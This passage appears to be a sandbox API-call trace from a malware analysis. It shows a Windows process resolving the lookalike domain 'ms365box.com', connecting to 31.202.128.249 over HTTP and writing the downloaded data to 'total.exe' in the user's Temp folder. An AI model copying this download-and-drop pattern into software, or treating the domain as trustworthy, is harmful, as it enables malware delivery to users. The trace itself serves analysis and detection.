0x1b84baf0 [0140.563] RasEnumConnectionsW (in: param_1=0x1b84baf0, param_2=0x1c78dbfc, param_3=0x1c78dbf8 | out: param_1=0x1b84baf0, param_2=0x1c78dbfc, param_3=0x1c78dbf8) returned 0x0 [0140.568] CoTaskMemFree (pv=0x1b84baf0) [0140.578] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c78da08 | out: lpWSAData=0x1c78da08) returned 0 [0140.587] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x430 [0140.591] setsockopt (s=0x430, level=65535, optname=128, optval="\x01", optlen=4) returned -1 
[0140.591] closesocket (s=0x430) returned 0 [0140.591] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x430 [0140.593] setsockopt (s=0x430, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0140.593] closesocket (s=0x430) returned 0 [0140.595] GetCurrentProcess () returned 0xffffffffffffffff [0140.596] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d288 | out: TokenHandle=0x1c78d288*=0x430) returned 1 [0140.597] GetCurrentProcess () returned 0xffffffffffffffff [0140.597] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d288 | out: TokenHandle=0x1c78d288*=0x434) returned 1 [0140.605] GetCurrentProcessId () returned 0xbf8 [0140.613] CoTaskMemAlloc (cb=0x204) returned 0x14e830 [0140.613] GetComputerNameW (in: lpBuffer=0x14e830, nSize=0x2ea21b0 | out: lpBuffer="AUFDDCNTXWT", nSize=0x2ea21b0) returned 1 [0140.613] CoTaskMemFree (pv=0x14e830) [0140.617] CoTaskMemAlloc (cb=0x20) returned 0x1b84ae80 [0140.617] RegQueryValueExW (in: hKey=0x438, lpValueName="Library", lpReserved=0x0, lpType=0x1c78d6bc, lpData=0x1b84ae80, lpcbData=0x1c78d6b8*=0x1c | out: lpType=0x1c78d6bc*=0x1, lpData="netfxperf.dll", lpcbData=0x1c78d6b8*=0x1c) returned 0x0 [0140.617] CoTaskMemFree (pv=0x1b84ae80) [0140.617] RegQueryValueExW (in: hKey=0x438, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c78d6ec, lpData=0x0, lpcbData=0x1c78d6e8*=0x0 | out: lpType=0x1c78d6ec*=0x4, lpData=0x0, lpcbData=0x1c78d6e8*=0x4) returned 0x0 [0140.618] RegQueryValueExW (in: hKey=0x438, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c78d6f0, lpData=0x1c78d6ec, lpcbData=0x1c78d6e8*=0x4 | out: lpType=0x1c78d6f0*=0x4, lpData=0x1c78d6ec*=0x1, lpcbData=0x1c78d6e8*=0x4) returned 0x0 [0140.618] RegQueryValueExW (in: hKey=0x438, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c78d6ec, lpData=0x0, lpcbData=0x1c78d6e8*=0x0 | out: 
lpType=0x1c78d6ec*=0x4, lpData=0x0, lpcbData=0x1c78d6e8*=0x4) returned 0x0 [0140.618] RegQueryValueExW (in: hKey=0x438, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c78d6f0, lpData=0x1c78d6ec, lpcbData=0x1c78d6e8*=0x4 | out: lpType=0x1c78d6f0*=0x4, lpData=0x1c78d6ec*=0x137a, lpcbData=0x1c78d6e8*=0x4) returned 0x0 [0140.623] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0140.641] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c78d660, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x43c [0140.643] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2ab0000 [0140.648] VirtualQuery (in: lpAddress=0x2ab0000, lpBuffer=0x1c78d658, dwLength=0x30 | out: lpBuffer=0x1c78d658*(BaseAddress=0x2ab0000, AllocationBase=0x2ab0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30 [0140.649] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ea6150, cbSid=0x1c78d640 | out: pSid=0x2ea6150*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d640) returned 1 [0140.651] WaitForSingleObject (hHandle=0x438, dwMilliseconds=0x1f4) returned 0x0 [0140.651] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ea6670, cbSid=0x1c78d5a0 | out: pSid=0x2ea6670*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5a0) returned 1 [0140.652] ReleaseMutex (hMutex=0x440) returned 1 [0140.653] GetProcessTimes (in: hProcess=0x440, lpCreationTime=0x1c78d5b0, lpExitTime=0x1c78d5a8, lpKernelTime=0x1c78d5a0, lpUserTime=0x1c78d598 | out: 
lpCreationTime=0x1c78d5b0, lpExitTime=0x1c78d5a8, lpKernelTime=0x1c78d5a0, lpUserTime=0x1c78d598) returned 1 [0140.654] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ea7690, cbSid=0x1c78d640 | out: pSid=0x2ea7690*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d640) returned 1 [0140.655] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ea84d0, cbSid=0x1c78d640 | out: pSid=0x2ea84d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d640) returned 1 [0140.655] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ea9308, cbSid=0x1c78d640 | out: pSid=0x2ea9308*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d640) returned 1 [0140.656] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eaa138, cbSid=0x1c78d640 | out: pSid=0x2eaa138*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d640) returned 1 [0140.656] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eaaf68, cbSid=0x1c78d5f0 | out: pSid=0x2eaaf68*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5f0) returned 1 [0140.657] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eabdb0, cbSid=0x1c78d5f0 | out: pSid=0x2eabdb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5f0) returned 1 [0140.657] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eacbc8, cbSid=0x1c78d5f0 | out: 
pSid=0x2eacbc8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5f0) returned 1 [0140.657] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ead9f0, cbSid=0x1c78d5f0 | out: pSid=0x2ead9f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5f0) returned 1 [0140.659] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eae810, cbSid=0x1c78d5f0 | out: pSid=0x2eae810*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5f0) returned 1 [0140.663] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x438 [0140.664] ioctlsocket (in: s=0x438, cmd=-2147195266, argp=0x1c78dc28 | out: argp=0x1c78dc28) returned 0 [0140.665] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x444 [0140.666] ioctlsocket (in: s=0x444, cmd=-2147195266, argp=0x1c78dc28 | out: argp=0x1c78dc28) returned 0 [0140.669] WSAIoctl (in: s=0x438, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c78dba0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c78dba0, lpOverlapped=0x0) returned -1 [0140.670] CoTaskMemAlloc (cb=0x204) returned 0x14e620 [0140.670] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x14e620, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0140.671] CoTaskMemFree (pv=0x14e620) [0140.671] WSAEventSelect (s=0x438, hEventObject=0x440, lNetworkEvents=512) returned 0 [0140.671] WSAIoctl (in: s=0x444, dwIoControlCode=0x28000017, lpvInBuffer=0x0, 
cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c78dba0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c78dba0, lpOverlapped=0x0) returned -1 [0140.671] CoTaskMemAlloc (cb=0x204) returned 0x14e620 [0140.671] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x14e620, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0140.671] CoTaskMemFree (pv=0x14e620) [0140.671] WSAEventSelect (s=0x444, hEventObject=0x448, lNetworkEvents=512) returned 0 [0140.672] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x44c, param_3=0x3) returned 0x0 [0140.676] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c78dce0 | out: phkResult=0x1c78dce0*=0x464) returned 0x0 [0140.678] RegNotifyChangeKeyValue (hKey=0x468, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x46c, fAsynchronous=1) returned 0x0 [0140.678] RegNotifyChangeKeyValue (hKey=0x470, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x474, fAsynchronous=1) returned 0x0 [0140.678] RegNotifyChangeKeyValue (hKey=0x478, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x47c, fAsynchronous=1) returned 0x0 [0140.678] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78db58 | out: TokenHandle=0x1c78db58*=0x480) returned 1 [0140.683] GetCurrentProcess () returned 0xffffffffffffffff [0140.683] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d328 | out: TokenHandle=0x1c78d328*=0x484) returned 1 [0140.687] GetCurrentProcess () returned 0xffffffffffffffff [0140.687] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d328 | out: TokenHandle=0x1c78d328*=0x488) returned 1 [0140.714] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c78dc28 | out: pProxyConfig=0x1c78dc28) returned 1 
[0140.868] SetEvent (hEvent=0x3d0) returned 1 [0140.903] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d9c8*=0x44c, lpdwindex=0x1c78d6e0 | out: lpdwindex=0x1c78d6e0) returned 0x80010115 [0140.903] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d9a8*=0x440, lpdwindex=0x1c78d6c0 | out: lpdwindex=0x1c78d6c0) returned 0x80010115 [0140.903] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d9a8*=0x448, lpdwindex=0x1c78d6c0 | out: lpdwindex=0x1c78d6c0) returned 0x80010115 [0140.903] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78da58*=0x46c, lpdwindex=0x1c78d770 | out: lpdwindex=0x1c78d770) returned 0x80010115 [0140.904] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78da58*=0x474, lpdwindex=0x1c78d770 | out: lpdwindex=0x1c78d770) returned 0x80010115 [0140.904] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78da58*=0x47c, lpdwindex=0x1c78d770 | out: lpdwindex=0x1c78d770) returned 0x80010115 [0140.907] GetCurrentProcess () returned 0xffffffffffffffff [0140.907] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d398 | out: TokenHandle=0x1c78d398*=0x4e0) returned 1 [0140.908] GetCurrentProcess () returned 0xffffffffffffffff [0140.908] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d398 | out: TokenHandle=0x1c78d398*=0x4e4) returned 1 [0140.932] SetEvent (hEvent=0x3d0) returned 1 [0140.991] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c78d868 | out: pFixedInfo=0x0, pOutBufLen=0x1c78d868) returned 0x6f [0141.006] GetNetworkParams (in: pFixedInfo=0x1b85b450, pOutBufLen=0x1c78d868 | out: pFixedInfo=0x1b85b450, pOutBufLen=0x1c78d868) returned 0x0 [0141.026] CoTaskMemAlloc (cb=0xd) returned 0x1b842f20 [0141.026] inet_addr (cp="192.168.0.1") 
returned 0x100a8c0 [0141.026] CoTaskMemFree (pv=0x1b842f20) [0141.029] LocalFree (hMem=0x1b85b450) returned 0x0 [0141.042] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f8 [0141.043] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f4 [0141.044] CoTaskMemAlloc (cb=0xe) returned 0x1b842f20 [0141.045] getaddrinfo (in: pNodeName="ms365box.com", pServiceName=0x0, pHints=0x1c78d810*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c78d808 | out: ppResult=0x1c78d808*=0x1b852290*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ms365box.com", ai_addr=0x1b842e80*(sa_family=2, sin_port=0x0, sin_addr="31.202.128.249"), ai_next=0x0)) returned 0 [0141.055] CoTaskMemFree (pv=0x1b842f20) [0141.055] CoTaskMemFree (pv=0x0) [0141.055] FreeAddrInfoW (pAddrInfo=0x1b852290*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ms365box.com", ai_addr=0x1b842e80*(sa_family=2, sin_port=0x0, sin_addr="31.202.128.249"), ai_next=0x0)) [0141.056] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x500 [0141.056] ioctlsocket (in: s=0x500, cmd=-2147195266, argp=0x1c78d828 | out: argp=0x1c78d828) returned 0 [0141.056] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x50c [0141.057] ioctlsocket (in: s=0x50c, cmd=-2147195266, argp=0x1c78d828 | out: argp=0x1c78d828) returned 0 [0141.057] WSAIoctl (in: s=0x500, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c78d7a0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c78d7a0, lpOverlapped=0x0) returned -1 [0141.057] CoTaskMemAlloc (cb=0x204) returned 0x14ec50 [0141.057] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, 
dwLanguageId=0x0, lpBuffer=0x14ec50, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0141.057] CoTaskMemFree (pv=0x14ec50) [0141.057] WSAEventSelect (s=0x500, hEventObject=0x508, lNetworkEvents=512) returned 0 [0141.057] WSAIoctl (in: s=0x50c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c78d7a0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c78d7a0, lpOverlapped=0x0) returned -1 [0141.057] CoTaskMemAlloc (cb=0x204) returned 0x14ec50 [0141.057] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x14ec50, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0141.058] CoTaskMemFree (pv=0x14ec50) [0141.058] WSAEventSelect (s=0x50c, hEventObject=0x510, lNetworkEvents=512) returned 0 [0141.059] GetAdaptersAddresses () returned 0x6f [0141.065] GetAdaptersAddresses () returned 0x0 [0141.079] WSAConnect (in: s=0x4f8, name=0x2eba318*(sa_family=2, sin_port=0x50, sin_addr="31.202.128.249"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0141.142] closesocket (s=0x4f4) returned 0 [0141.168] send (in: s=0x4f8, buf=0x2ebddc0*, len=70, flags=0 | out: buf=0x2ebddc0*) returned 70 [0141.172] setsockopt (s=0x4f8, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0141.172] recv (in: s=0x4f8, buf=0x2eb6860, len=4096, flags=0 | out: buf=0x2eb6860*) returned 479 [0141.228] setsockopt (s=0x4f8, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0141.253] VirtualQuery (in: lpAddress=0x1c78d400, lpBuffer=0x1c78e2c0, dwLength=0x30 | out: lpBuffer=0x1c78e2c0*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, 
State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0141.257] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0141.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.257] CoTaskMemFree (pv=0x1b869280) [0141.258] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0141.258] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0141.258] CoTaskMemFree (pv=0x1b869280) [0141.301] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0141.301] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0141.302] CoTaskMemFree (pv=0x1b869280) [0141.359] GetLongPathNameW (in: lpszShortPath="C:\\Users\\ADU0VK~1\\", lpszLongPath=0x1c78cf90, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\aDU0VK IWA5kLS\\") returned 0x18 [0141.359] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", nBufferLength=0x105, lpBuffer=0x1c78d010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", lpFilePart=0x0) returned 0x34 [0141.360] SetErrorMode (uMode=0x1) returned 0x1 [0141.360] CreateFileW (lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\total.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4f4 [0141.360] GetFileType (hFile=0x4f4) returned 0x1 [0141.360] SetErrorMode (uMode=0x1) returned 0x1 [0141.360] GetFileType (hFile=0x4f4) returned 0x1 [0141.360] SetEvent (hEvent=0x3d0) returned 1 [0141.361] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d048*=0x44c, lpdwindex=0x1c78cd60 | out: 
lpdwindex=0x1c78cd60) returned 0x80010115 [0141.361] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d028*=0x440, lpdwindex=0x1c78cd40 | out: lpdwindex=0x1c78cd40) returned 0x80010115 [0141.361] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d028*=0x448, lpdwindex=0x1c78cd40 | out: lpdwindex=0x1c78cd40) returned 0x80010115 [0141.362] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d0d8*=0x46c, lpdwindex=0x1c78cdf0 | out: lpdwindex=0x1c78cdf0) returned 0x80010115 [0141.362] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d0d8*=0x474, lpdwindex=0x1c78cdf0 | out: lpdwindex=0x1c78cdf0) returned 0x80010115 [0141.362] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d0d8*=0x47c, lpdwindex=0x1c78cdf0 | out: lpdwindex=0x1c78cdf0) returned 0x80010115 [0141.363] select (in: nfds=0, readfds=0x2eed5a8, writefds=0x0, exceptfds=0x0, timeout=0x1c78d300 | out: readfds=0x2eed5a8, writefds=0x0, exceptfds=0x0) returned 0 [0141.364] send (in: s=0x4f8, buf=0x2eed768*, len=41, flags=0 | out: buf=0x2eed768*) returned 41 [0141.365] setsockopt (s=0x4f8, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0141.365] recv (in: s=0x4f8, buf=0x2eb6860, len=4096, flags=0 | out: buf=0x2eb6860*) returned 4096 [0141.421] setsockopt (s=0x4f8, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0141.421] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 7584 [0141.422] WriteFile (in: hFile=0x4f4, lpBuffer=0x2efe368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c78d458, lpOverlapped=0x0 | out: lpBuffer=0x2efe368*, lpNumberOfBytesWritten=0x1c78d458*=0x1000, lpOverlapped=0x0) returned 1 [0141.423] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee451*, nNumberOfBytesToWrite=0x1c9f, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 
| out: lpBuffer=0x2eee451*, lpNumberOfBytesWritten=0x1c78d4b8*=0x1c9f, lpOverlapped=0x0) returned 1 [0141.423] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 23360 [0141.482] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x5b40, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x5b40, lpOverlapped=0x0) returned 1 [0141.482] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 2920 [0141.482] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 23360 [0141.531] WriteFile (in: hFile=0x4f4, lpBuffer=0x2efe368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c78d458, lpOverlapped=0x0 | out: lpBuffer=0x2efe368*, lpNumberOfBytesWritten=0x1c78d458*=0x1000, lpOverlapped=0x0) returned 1 [0141.531] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee7e8*, nNumberOfBytesToWrite=0x56a8, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee7e8*, lpNumberOfBytesWritten=0x1c78d4b8*=0x56a8, lpOverlapped=0x0) returned 1 [0141.531] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 35040 [0141.587] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x88e0, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x88e0, lpOverlapped=0x0) returned 1 [0141.589] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 54020 [0141.589] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xd304, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xd304, lpOverlapped=0x0) returned 1 [0141.590] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 1460 [0141.590] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: 
buf=0x2eee350*) returned 14600 [0141.646] WriteFile (in: hFile=0x4f4, lpBuffer=0x2efe368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c78d458, lpOverlapped=0x0 | out: lpBuffer=0x2efe368*, lpNumberOfBytesWritten=0x1c78d458*=0x1000, lpOverlapped=0x0) returned 1 [0141.646] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eeed9c*, nNumberOfBytesToWrite=0x2ebc, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eeed9c*, lpNumberOfBytesWritten=0x1c78d4b8*=0x2ebc, lpOverlapped=0x0) returned 1 [0141.646] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 65536 [0141.647] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x10000, lpOverlapped=0x0) returned 1 [0141.648] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 14764 [0141.648] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x39ac, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x39ac, lpOverlapped=0x0) returned 1 [0141.648] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 16060 [0141.652] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x3ebc, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x3ebc, lpOverlapped=0x0) returned 1 [0141.653] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 54020 [0141.654] WriteFile (in: hFile=0x4f4, 